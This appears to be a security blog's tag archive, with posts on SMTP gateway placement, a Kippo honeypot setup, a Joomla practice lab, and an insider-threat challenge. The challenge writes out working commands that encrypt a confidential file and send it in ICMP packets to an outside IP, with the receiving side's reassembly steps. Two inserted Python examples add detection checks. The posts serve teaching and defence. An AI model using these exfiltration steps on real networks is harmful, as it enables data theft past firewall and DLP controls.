Tag Archives: network security

SMTP Gateway placement

Where and how should I place my SMTP gateway in the security infrastructure?

I saw this question going around on one of the mailing lists I am subscribed to and would like to share some thoughts about it. This is old-school stuff, since our IT security perimeters are being diluted from a well-defined structure into unclear boundaries by the new mobility, apps and cloud ecosystem. Every day new threats exploit the borderless network, and mobile platforms are a prime target. However, companies still need the traditional security perimeter, and it's always good to refresh the old network security architecture and concepts. In addition, SMTP is a popular vehicle for malware infection and distribution.

There is no right or wrong answer to this question, since it all depends on your organization's size and risk appetite. Designing a specific network security solution for a business of any size is an engineering and creative task. However, there are plenty of industry guidelines and best practices that you should follow in order to have a layered security approach with defense in depth, using redundant and overlapping security controls that mitigate or reduce the risk. Let's review three technical suggestions for deploying your perimeter SMTP gateway.

Single-arm deployment: You can have a single-arm configuration in your perimeter firewall. This is a simple solution and makes routing and switching easy. In this DMZ you position your SMTP appliance. This appliance will normally be one of the many SMTP gateway products out there, like TrendMicro IMSS, Ironport ESA, eSafe Gateway, etc. It will normally do anti-virus and anti-spam (both ingress and egress). With this solution you have a single physical network interface and you run all the services on it. This means the SMTP traffic to the Internet and to the internal MTA, such as Microsoft Exchange. You will also run all the management protocols on it, like HTTPS and SSH for accessing the management interface, SNMP for monitoring, Syslog for logging and others like LDAP. This solution is very simple, with almost no complexity and low maintenance costs. It won't need any special routing and switching and will be easy to troubleshoot. However, your security posture won't be the best and you won't have segregation of data, which means management and production/data traffic will run on the same interface. You also need to consider that running all these protocols on one interface might consume a significant amount of the physical interface's bandwidth.

Two-arm deployment: With this configuration you have one interface connected to the outside, typically the external firewall, and one interface connected to the inside, typically the internal firewall. (It's also possible to create a two-arm solution with a single firewall.) The appliance needs to have two physical interfaces, each one in a different subnet. Normally you call the external interface the frontend and the internal interface the backend. Management traffic will only be accessible through the backend interface.

Three-arm deployment: If you must have management traffic separated from data/production traffic, this is the best solution. Of course, your security infrastructure framework should already support this kind of model in order to have proper routing and switching. This setup requires three physical interfaces, each one on a different subnet. Normally the management interface will be in the same subnet as the management interfaces of other security infrastructure appliances. With this solution you have great control and flexibility over the data and management traffic, which means better security, at the expense of routing and switching complexity. This solution is normally harder to troubleshoot.

Those three models are the ones typically seen in enterprises, from small and medium to large corporations.

In addition to the positioning, you should also have defense in depth for the SMTP protocol. This means you should consider different layers of AV/anti-spam inspection. Normally, you will have inspection at the gateway level, then at the MTA level and finally at the client level. You can further complement these levels with a layer 2 inspection gateway before or after your SMTP gateway. Do not forget to have an IDS doing SMTP inspection along the traffic path as part of a robust network defense solution. Furthermore, you also need to address DNS concerns for SMTP to work properly. Apart from the MX and A records for SMTP delivery, you might need PTR, SPF and other records properly registered.

PS: If time permits I will add some diagrams to illustrate each one of the deployment models.


Deception Techniques

In the Tactical Deception Field Manual FM 90-2 of the US Army, the concept of deception is described as those measures designed to mislead enemy forces by manipulation, distortion, or falsification of evidence to induce him to react in a manner prejudicial to his interests. In the cyber world, the deception concept and deception techniques were introduced in the early 1990s with the use of honeypots [1].

Honeypots are decoy systems that attract attackers to attempt to compromise them [2], whose value lies in being probed, attacked or compromised [3]. In addition, honeypots can be used to gain advantage in network security. For instance they provide intelligence based on information and knowledge obtained through observation, investigation, analysis, or understanding [4].

Deception techniques such as honeypots are powerful and flexible techniques offering great insight into malicious activity as well as an excellent opportunity to learn about offensive practices. In this post I will be introducing how to create a honeypot for research purposes to learn about attack methods.

If you want to learn more about computer deception, I recommend reading Fred Cohen's articles. With regard to honeypots, I definitely recommend the landmark book authored by Lance Spitzner in 2002 and published by Addison-Wesley. One of the many things Lance introduces in his book is the concept of level of interaction to distinguish the different types of honeypots. Basically, this concept provides a way to measure the level of interaction that the system will provide to the attacker. In this post I will be using a medium interaction honeypot called Kippo.

An important aspect before running a honeypot is to make sure you are aware of the legal implications of running one. You might need to get legal counsel with privacy expertise first. The legal concerns are normally around data collection and privacy, especially for high-interaction honeypots. You might also need permission from your hosting company if, for example, you run a honeypot on a virtual private server (VPS). Lance, in his book, has one full chapter dedicated to the legal aspects. Regarding hosting companies that might allow you to run a honeypot, you might want to check Solar vps, VpsLand or Tagadap.

Let's illustrate how to set up the Kippo SSH honeypot. Kippo is specialized in logging brute force attacks against SSH. It's also able to store information about the actions the attacker took when they manage to break in. Kippo is considered a low interaction honeypot. In addition, I will be demonstrating how to use a third-party application called Kippo-graph to gather statistics and visualize them.

Based on the tests I made, the easiest way to set up Kippo is on a Debian Linux distro. To install it we need a set of packages which are mentioned in the requirements section of the project page. In my case I had a Debian 6 64-bit system with the core build packages installed and did the following:

I used apt (Advanced Packaging Tool), which is the easiest way to retrieve, configure and install Debian packages in an automated fashion. I installed subversion to be able to then download Kippo, plus all the packages mentioned in the requirements. I then verified that the Python version is the one needed. During the installation of the mysql-server package you should be prompted to enter a password for MySQL.

# apt-get update
# apt-get install subversion python-zope python-crypto python-twisted mysql-server ntp python-mysqldb

# python -V
Python 2.6.6

Check the status of MySQL, then try to login with the password inserted during the installation:
# service mysql status
# mysql -u root -p
Enter password:
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 42
Server version: 5.1.66-0+squeeze1 (Debian)
mysql> quit

Check if we have a timesource configured and NTP is syncing:
#ntpq
ntpq> peers
ntpq> quit

Download Kippo using svn. Create the initial configuration file, then log in to MySQL and create the necessary database and tables:
# svn checkout http://kippo.googlecode.com/svn/trunk/ /opt/kippo
# cd /opt/kippo/
# cp kippo.cfg.dist kippo.cfg
# mysql -u root -p
mysql> CREATE DATABASE kippo;
mysql> USE kippo;
mysql> SOURCE /opt/kippo/doc/sql/mysql.sql
mysql> show tables;
mysql> quit;

Edit the kippo.cfg file and set the hostname directive, ssh port, and banner file. Also uncomment all the directives shown below regarding the ability of Kippo to log into the MySQL database. Make sure you adapt the fields to your environment and use strong passwords:

# vi kippo.cfg

# Kippo's listening port; it must be the port the iptables REDIRECT rule
# targets and the filter rules allow (2222 in the rest of this post)
ssh_port = 2222
hostname = server
banner_file = /etc/issue.net

[database_mysql]
host = localhost
database = kippo
username = root
password = secret

Edit the file /etc/issue.net on the system and insert a banner similar to the following:
This system is for the use of authorized users only. Individuals using this computer system without authority, or in excess of their authority, are subject to having all of their activities on this system monitored and recorded by system personnel. In the course of monitoring individuals improperly using this system, or in the course of system maintenance, the activities of authorized users may also be monitored. Anyone using this system expressly consents to such monitoring and is advised that if such monitoring reveals possible evidence of criminal activity, system personnel may provide the evidence of such monitoring to law enforcement officials.

Verify which username and password Kippo accepts, so that the attacker believes he found the correct credentials and broke in:
# cd /opt/kippo/data
# cat userdb.txt
root:0:123456

Then add a non-privileged user that will be used to launch Kippo. The ownership of the Kippo files and directories also needs to be changed to the user just created:
# useradd -m --shell /bin/bash kippo
# cd /opt/
# chown kippo:kippo kippo/ -R
# su kippo
$ cd kippo
$ ./start.sh
Starting kippo in background…Generating RSA keypair…
done.
$ exit

By default (as you might have noticed in kippo.cfg) Kippo runs on port 2222. Because we start Kippo as a non-privileged user, we cannot change it to port 22. One way to work around this is to edit the /etc/ssh/sshd_config file and change the listening port to something unusual, which will be used to manage the system. Then create an iptables rule that redirects TCP traffic destined to port 22 to the port where Kippo is running.
# grep Port /etc/ssh/sshd_config
Port 48022
# service ssh restart

# iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 22 -j REDIRECT --to-port 2222

Depending on your setup, you might or might not need additional firewall rules. In my case I had the system directly exposed to the Internet, therefore I needed to create additional firewall rules. For iptables on Debian you might want to check this wiki page.

Create a file with the enforcement rules. I will not be including the redirect rule, because that allows me to control when to start and stop redirecting traffic.
# vi /etc/iptables.rules
# Sample firewall configuration
*filter
:INPUT ACCEPT [0:0]
:FORWARD ACCEPT [0:0]
:OUTPUT ACCEPT [0:0]
:RH-Firewall-1-INPUT - [0:0]
-A INPUT -j RH-Firewall-1-INPUT
-A FORWARD -j RH-Firewall-1-INPUT
-A RH-Firewall-1-INPUT -i lo -j ACCEPT
-A RH-Firewall-1-INPUT -p icmp --icmp-type any -j ACCEPT
-A RH-Firewall-1-INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
-A RH-Firewall-1-INPUT -m state --state NEW -m tcp -p tcp --dport 22 -j ACCEPT
-A RH-Firewall-1-INPUT -m state --state NEW -m tcp -p tcp --dport 2222 -j ACCEPT
-A RH-Firewall-1-INPUT -m state --state NEW -m tcp -p tcp --dport 48022 -j ACCEPT
-A RH-Firewall-1-INPUT -m state --state NEW -m tcp -p tcp --dport 48080 -j ACCEPT
-A RH-Firewall-1-INPUT -j REJECT --reject-with icmp-host-prohibited
COMMIT

I am allowing ICMP traffic, plus TCP ports 22 and 2222 for Kippo and 48022 to access the system. Port 48080 is for kippo-graph.

Note that you might want to add the --source x.x.x.x directive to the rules that allow access to the real SSH and HTTP daemons, allowing only your IP address to connect to them.

Then we apply the iptables rules by redirecting the contents of the file to the iptables-restore command. We also need a small script that loads the iptables rules each time the machine restarts, as documented on the Debian wiki.

# iptables-restore < /etc/iptables.rules

# vi /etc/network/if-pre-up.d/iptables
#!/bin/bash
# Load the rules file created above before the interface comes up
/sbin/iptables-restore < /etc/iptables.rules

Change the file mode bits:
# chmod +x /etc/network/if-pre-up.d/iptables

Subsequently we can install kippo-graphs. To do that we need a set of additional packages:
#apt-get install apache2 libapache2-mod-php5 php5-cli php5-common php5-cgi php5-mysql php5-gd

After that we download kippo-graph into the webserver root folder, untar it, change the permissions of the generated-graphs folder and change the values in config.php.
# cd /var/www

# wget http://bruteforce.gr/wp-content/uploads/kippo-graph-0.7.2.tar --user-agent=""
# md5sum kippo-graph-0.7.2.tar
# tar xvf kippo-graph-0.7.2.tar
# cd kippo-graph
# chmod 777 generated-graphs

# vi config.php
define('DB_HOST', 'localhost');
define('DB_USER', 'kippo');
define('DB_PASS', 'secret');
define('DB_NAME', 'kippo');

Edit the ports configuration settings, under the Apache folder, to change the port to something hard to guess like 48080. Then change the VirtualHost directive to the port chosen.

# vi /etc/apache2/ports.conf
NameVirtualHost *:48080
Listen 48080

#vi /etc/apache2/sites-enabled/000-default
<VirtualHost *:48080>

#service apache2 restart

Then you can point the browser to your system IP and load the kippo-graph URL. After you have confirmed it's working you should stop Apache. In my case I only start Apache to visualize the statistics.

With this you should have a Kippo environment running, plus the third-party graphs. One important aspect is that every time you reboot the system you need to: access the system using the port specified in the sshd config file; apply the iptables traffic redirection; stop the Apache service and start Kippo. This can be done automatically, but I prefer to have control over those aspects because then I know when I start and stop the Kippo service.

# ssh vps.site.com -l root -p 48022
# iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 22 -j REDIRECT --to-port 2222

#service apache2 stop
Stopping web server: apache2 … waiting .
#su kippo
$ cd /opt/kippo/
$ ./start.sh
Starting kippo in background…
Loading dblog engine: mysql
$ exit
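
A pre-flight check for the port plan used in this setup, as an added example that is not part of the original post or of Kippo: it reads the sshd port, Kippo's ssh_port and the iptables rules, and reports a redirect that would hand port 22 traffic to the real sshd instead of the honeypot. The inline file contents are constructed samples, and the [honeypot] section name in kippo.cfg and all function names are assumptions.

```python
import configparser
import re

# Constructed samples mirroring the files edited in this post.
SSHD_CONFIG = "Port 48022\nPermitRootLogin no\n"
KIPPO_CFG = "[honeypot]\nssh_port = 2222\nhostname = server\n"
NAT_GOOD = "-A PREROUTING -i eth0 -p tcp --dport 22 -j REDIRECT --to-port 2222"
NAT_BAD = "-A PREROUTING -i eth0 -p tcp --dport 22 -j REDIRECT --to-port 48022"
FILTER_RULES = """\
-A RH-Firewall-1-INPUT -m state --state NEW -m tcp -p tcp --dport 2222 -j ACCEPT
-A RH-Firewall-1-INPUT -m state --state NEW -m tcp -p tcp --dport 48022 -j ACCEPT
"""

def sshd_ports(text):
    """Ports the real sshd listens on; sshd defaults to 22 without a Port line."""
    ports = {int(p) for p in re.findall(r"^\s*Port\s+(\d+)", text, re.M)}
    return ports or {22}

def kippo_port(text):
    """Kippo's listening port (assumed to live in the [honeypot] section)."""
    cfg = configparser.ConfigParser(interpolation=None)
    cfg.read_string(text)
    return cfg.getint("honeypot", "ssh_port", fallback=2222)

def redirects(nat_rules):
    """(dport, to_port) for each REDIRECT rule; accepts --to-port and --to-ports."""
    found = []
    for line in nat_rules.splitlines():
        dport = re.search(r"--dport\s+(\d+)", line)
        target = re.search(r"--to-ports?\s+(\d+)", line)
        if "-j REDIRECT" in line and dport and target:
            found.append((int(dport.group(1)), int(target.group(1))))
    return found

def accepted_ports(filter_rules):
    """Destination ports that an ACCEPT rule in the filter table lets in."""
    return {int(p) for line in filter_rules.splitlines() if "-j ACCEPT" in line
            for p in re.findall(r"--dport\s+(\d+)", line)}

def check_plan(sshd_cfg, kippo_cfg, nat_rules, filter_rules):
    """Return a list of problems; an empty list means the plan is consistent."""
    mgmt, pot = sshd_ports(sshd_cfg), kippo_port(kippo_cfg)
    allowed = accepted_ports(filter_rules)
    problems = []
    if pot in mgmt:
        problems.append(f"Kippo and the real sshd both claim port {pot}")
    for dport, target in redirects(nat_rules):
        if target in mgmt:
            problems.append(f"port {dport} is redirected to the real sshd on {target}")
        elif target != pot:
            problems.append(f"port {dport} is redirected to {target}, Kippo listens on {pot}")
        if dport in mgmt:
            problems.append(f"management port {dport} is itself redirected")
    # PREROUTING rewrites the destination port before the filter table sees the
    # packet, so the filter rules must accept Kippo's own port.
    if pot not in allowed:
        problems.append(f"filter table does not accept Kippo port {pot}")
    for port in sorted(mgmt - allowed):
        problems.append(f"filter table does not accept management port {port}")
    return problems

if __name__ == "__main__":
    for name, nat in (("good", NAT_GOOD), ("bad", NAT_BAD)):
        print(name, check_plan(SSHD_CONFIG, KIPPO_CFG, nat, FILTER_RULES) or "OK")
```
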

Based on my experience it shouldn't take more than 48 hours to have someone breaking into the system. You can then watch and learn. In addition, after a couple of hours you should start seeing brute force attempts.

If you want to read more about other honeypots, ENISA (European Network and Information Security Agency) just recently released a study about honeypots called “Proactive Detection of Security Incidents II: Honeypot”. It's the result of a comprehensive and in-depth investigation into current honeypot technologies. With a focus on open-source solutions, a total of 30 different standalone honeypots were tested and evaluated. It's definitely a must-read.

In a future post I will write about the findings of running these deception systems to lure attackers.

References:
[1] The use of Deception Techniques: Honeypots and decoys, Fred Cohen
[2] The Art of Computer Virus Research and Defense, Peter Szor, Symantec Press
[3] Honeypots. Tracking Hackers, Lance Spitzner, Addison-Wesley
[4] Designing Deception Operations for Computer Network Defense. Jim Yuill, Fred Feer, Dorothy Denning, Fall


Hands-on Lab – eCommerce – Part 1

An important aspect of network security is hands-on experience. Considering this, I would like to share a step-by-step guide that illustrates how to create a web content management system with eCommerce shopping cart software. What is the purpose? The purpose is to create a simulated real-world e-commerce website in a controlled and virtual environment. Here you can find known vulnerabilities that will allow you to learn and practice security concepts. It will also give you a scenario where you can practice offensive and defensive techniques legally, safely and for educational purposes. The scenario is based on an older version of Joomla and Virtuemart running on a LAMP (Linux, Apache, MySQL, PHP) stack.

Probably the most common attack vector against Joomla-based content management websites is SQL injection. The National Vulnerability Database shows 755 matching records when searching for CVEs affecting Joomla versions. ExploitDB shows 839 potential exploits for different Joomla versions and a variety of components: 487 SQL Injection related, 30 Cross Site Scripting, 42 Local File Inclusion, 25 Remote File Inclusion and others. If you are familiar with VMware, this scenario can easily be extended with an attacker system running Backtrack, plus a firewall like pfSense and/or an IDS like Snort between the systems. This will allow you to further extend your skills in intrusion analysis, incident handling, penetration testing and others.


Insider Threat – Dee Cypher

In my previous post I wrote about gamification and how it can be used to learn security skills. Let's further illustrate this with a challenge that represents the risks of insider threats: exfiltrating data using covert channels. A typical case of espionage:

Justin Case, a high-priced lawyer and an operative for V.I.L.E., found that ACME is working on a new high-profile deal. Justin Case wants to get his hands on that information to sell it to the competitors. He just contacted another operative from V.I.L.E., Dee Cypher, who has insider access to ACME. His mission is to smuggle confidential information past the high-end security controls in place, like firewalls and Data Loss Prevention. During a secret meeting they shared some information: ACME is running the latest version of Checkpoint Firewall with rigid rules; however, it allows ping requests to be made, with a maximum ping size protection of 1400 bytes. Also, to bypass DLP inspection, they agreed that the information should be sent encrypted using symmetric encryption, AES 256 bits, with a shared secret that they agreed upon.

How can Dee Cypher and Justin Case accomplish this mission?

DeeCypher$ md5sum SecretPlans.pdf
0c376606bbbca8f089151df189edfd8b SecretPlans.pdf
DeeCypher$ openssl enc -e -aes-256-cbc -in SecretPlans.pdf -out SecretPlans.enc
DeeCypher$ ls -lrta
-rw-r--r-- 1 DeeCypher DeeCypher 30800 2012-11-17 15:49 SecretPlans.enc
DeeCypher$ echo 'scale=2;30800/1400' | bc -q
DeeCypher$ sudo hping3 -E SecretPlans.enc -1 -u -d 1400 220.132.33.16 -c 22

JustinCase$ sudo tcpdump -nni eth0 -s0 proto 1 -w receiving.pcap
JustinCase$ tshark -r receiving.pcap -R 'icmp.type==8' -w data.pcap
JustinCase$ tshark -r data.pcap -T fields -e data | xxd -r -p > SecretPlans.enc
JustinCase$ openssl enc -d -aes-256-cbc -in SecretPlans.enc -out SecretPlans.pdf
JustinCase$ md5sum SecretPlans.pdf
0c376606bbbca8f089151df189edfd8b SecretPlans.pdf
JustinCase$ acroread SecretPlans.pdf

Let's describe the commands of Dee Cypher. First, the MD5 of SecretPlans.pdf was produced, which can then be used to verify the file integrity. Next, the file SecretPlans.pdf was encrypted using the AES-256-CBC algorithm, resulting in SecretPlans.enc. Then SecretPlans.enc was checked, and it contains 30800 bytes. Now he wanted to know how many ICMP packets he would need to send the contents of the file using a payload of 1400 bytes. To do this he used the precision calculator bc in quiet mode and divided the file size by the size of the payload. The result was formatted to show two digits after the decimal point; it's 22. This means he will need 22 packets to send the whole contents of the file. To forge the ICMP packets, hping3 was used. He specified the file whose contents fill the packet data, ICMP mode as the traffic type, a data size of 1400 and a total of 22 packets.

On the other end, JustinCase executed tcpdump to capture ICMP traffic with no limit on the captured packet size. Using tshark, he extracted the traffic that matched the Wireshark filter for ICMP Echo Request (type 8) and wrote it into data.pcap. Then he extracted the data portion of the ICMP payload. The output of this command was piped into xxd to convert the plain hexdump back into binary. The file was decrypted using the same algorithm, and finally its integrity was checked and the file was opened with Acrobat Reader.

Note: In this example a Checkpoint R75 with the IPS and DLP blades enabled was used. The IPS had a Max Ping Size of 1400 bytes configured. By default the IPS does not have the Max Ping Size protection enabled, and the default value is 2500 bytes. Further, ICMP traffic is not covered by DLP inspection, which means the data could be sent in clear text instead of encrypted.

After having fun, and perhaps engaging people to take on this challenge with other possibilities and tools, let's think about it. This example demonstrates that insider threat should be a serious concern for today's organizations. In this case intellectual property or confidential information could be stolen. Understanding how susceptible you are to insider threat is a valuable step in developing controls to detect, remediate and mitigate it. Access to information outside of need to know, unauthorized encryption of information and unauthorized information transfer are examples of technical actions and indicators that could be used in this case as observables for possible detection.
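
One way to turn the "unauthorized information transfer" observable into a check, as an added example that is not from the original post: a size cap such as Max Ping Size limits each packet but not the volume of a flow, so this sketch scores ICMP echo-request flows by total payload bytes and by how often the payload changes between packets. The packets, addresses (documentation ranges), thresholds and function names are constructed assumptions.

```python
import hashlib
import math
import struct
from collections import Counter, defaultdict

ECHO_REQUEST = 8

def echo_request(ident, seq, payload):
    """ICMP echo request bytes; checksum left 0, the detector does not validate it."""
    return struct.pack("!BBHHH", ECHO_REQUEST, 0, 0, ident, seq) + payload

def pseudo_random(n, seed=b"constructed"):
    """Deterministic stand-in for ciphertext: a SHA-256 counter stream."""
    blocks = (hashlib.sha256(seed + i.to_bytes(4, "big")).digest()
              for i in range(n // 32 + 1))
    return b"".join(blocks)[:n]

def entropy(data):
    """Shannon entropy in bits per byte (0.0 for empty input)."""
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values()) if n else 0.0

def sample_capture():
    """Constructed (src, dst, icmp_message) tuples for three flows."""
    dst, pkts = "198.51.100.7", []
    blob = pseudo_random(30800)              # same size as the file in the post
    for seq in range(22):                    # 22 x 1400 bytes, all different
        chunk = blob[seq * 1400:(seq + 1) * 1400]
        pkts.append(("192.0.2.10", dst, echo_request(1, seq, chunk)))
    pattern = bytes(i % 256 for i in range(1400))
    for seq in range(22):                    # large diagnostic ping, fixed pattern
        pkts.append(("192.0.2.20", dst, echo_request(2, seq, pattern)))
    for seq in range(4):                     # ordinary 56-byte ping
        stamp = struct.pack("!QQ", 1353167340 + seq, 0)
        pkts.append(("192.0.2.30", dst, echo_request(3, seq, stamp + bytes(range(16, 56)))))
    return pkts

def score_flows(packets, min_bytes=8192, min_unique=0.5):
    """Score each (src, dst) echo-request flow and flag likely data transfer."""
    flows = defaultdict(list)
    for src, dst, msg in packets:
        if len(msg) < 8:
            continue
        icmp_type, code, _csum, _ident, _seq = struct.unpack("!BBHHH", msg[:8])
        if icmp_type == ECHO_REQUEST and code == 0:
            flows[(src, dst)].append(msg[8:])
    report = {}
    for flow, payloads in flows.items():
        total = sum(len(p) for p in payloads)
        # ping repeats one payload; skip the first 16 bytes, where ping
        # implementations commonly store a per-packet timestamp.
        unique = len({p[16:] for p in payloads}) / len(payloads)
        report[flow] = {
            "packets": len(payloads),
            "bytes": total,
            "unique_ratio": unique,
            # Shown for comparison only: a patterned 1400-byte ping also scores
            # close to 8 bits/byte, so entropy alone is not the trigger.
            "max_entropy": max(entropy(p) for p in payloads),
            "flagged": total >= min_bytes and unique >= min_unique,
        }
    return report

if __name__ == "__main__":
    for flow, stats in score_flows(sample_capture()).items():
        print(flow, stats)
```
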

In 2006, the CERT Coordination Center, which is located at Carnegie Mellon University, released a technical report, “Comparing Insider IT Sabotage and Espionage: A model-based analysis”. This study considered not only the technical factors that contribute to espionage and sabotage cases but also the psychological, organizational and contextual factors. It's definitely a good read for security professionals and leaders with responsibility for the organization's security posture. Other than that, the CERT Insider Threat Center provides comprehensive and detailed information about this topic.


Day one for Count upon Security

I am very excited about this new project. It will allow me to contribute to the IT security community with material about multiple security disciplines. My goal is to share comprehensive information, increase awareness and provide illustrations about security matters. Optimistically, it will allow you to learn new skills, reinforce current ones or just read for fun and pleasure. At the moment I have lots of ideas in my mind about topics that I would like to share and discuss with you, and I just need to start putting them on paper.

One of the main reasons I'm starting this blog is that I work in the security field, and based on my experience I have reason to believe that the information security industry will continue to grow in size, density and specialization. Therefore the demand for qualified security professionals who possess knowledge and skills will increase substantially. One of my aims is to help you grow your security expertise and awareness. That doesn't mean you will find a job here, but an IT security career is a very interesting one to take.

Just recently, this article illustrated this job demand. As you could read, the Homeland Security Department of the United States created a new fellowship program designed to attract recent college graduates into cyber security careers. They also said that its cyber workforce increased by 600 percent over the last few years. Furthermore, the last search I made with the keyword security on JobServe for the IT & Telecommunications industry in the UK showed 1429 jobs. On the Swiss job portal jobs.ch, the last query I made with the same keyword gave 448 results, which is quite amazing considering the size of the country.
